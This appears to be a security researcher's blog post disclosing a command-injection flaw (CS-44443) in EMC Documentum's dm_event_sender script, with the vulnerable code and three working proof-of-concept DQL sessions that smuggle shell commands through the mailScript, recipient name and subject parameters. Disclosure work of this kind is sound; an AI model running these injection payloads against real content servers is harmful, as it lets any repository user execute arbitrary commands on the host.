God bless EMC. Part II

Another brilliant example of developers’ idiocy is CS-44443. In D6.7SP1P24 EMC silently made changes in dm_event_sender.ebs script:

--- /tmp/dm_event_sender.ebs    2014-01-29 19:06:52.000000000 +0300
+++ bin/dm_event_sender.ebs     2014-01-31 20:08:54.000000000 +0300
@@ -457,7 +457,7 @@
     If do_single_message = True Then
         recipient_name$ = sender_name$
     End If
-
+    mailScript$ = "./dm_mailwrapper.sh"
     mailCommand$ = mailScript _
     & " " & "-delete_contents" _
     & " " & subject_line$ _

now dm_event_sender.ebs ignores value of mailScript parameter, but it is still vulnerable…

documentum security vulnerabilities: dm_event_sender

dm_event_sender.ebs does not check input parameters, so any user is able to execute shell command on content server host using DQL queury.

'Send the completed email:

If platform$ = "WIN32" Then
    mailScript$ = ".\smail.exe"
    mailCommand$ = mailScript$ _
    & " " & "-nohttp" _
    & " " & "-delete_contents" _
    & " " & "-S " & subject_line$ _
    & " " & "-A " & recipient_name$ _
    & " " & "-F " & temp_file_name$ _
    & " " & "-Server " & smtp_server$ _
    & " " & "-M " & mail_user_name$
Else
    ' We must change the recipient if this is a single message bulk-mail.
    If do_single_message = True Then
        recipient_name$ = sender_name$
    End If

    mailCommand$ = mailScript _
    & " " & "-delete_contents" _
    & " " & subject_line$ _
    & " """ & recipient_name$ & """" _
    & " " & temp_file_name$
End If

If debug = "1" Then
  LogMsg("mailCommand= " & mailCommand$)
End If

result% = ShellSync(mailCommand)

exploitation of mailScript parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" ""
> "" "" "" "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx"
> "/bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;"
> " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

exploitation of recipient_name parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender', 
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" "" "" "" 
> "\"; /bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;\"" 
> "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

exploitation of subject_line:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "\`touch /tmp/text.txt\`"
> "" "" "" "" "" "" "" "" "" "" "" "" "" "WIN32" "xxx"
> "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " "127.0.0.1"'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
 ~]$

This vulnerability was reported as CS-44443 (Security vulnerability with dm_event_sender allows execution of applications on Content Server host)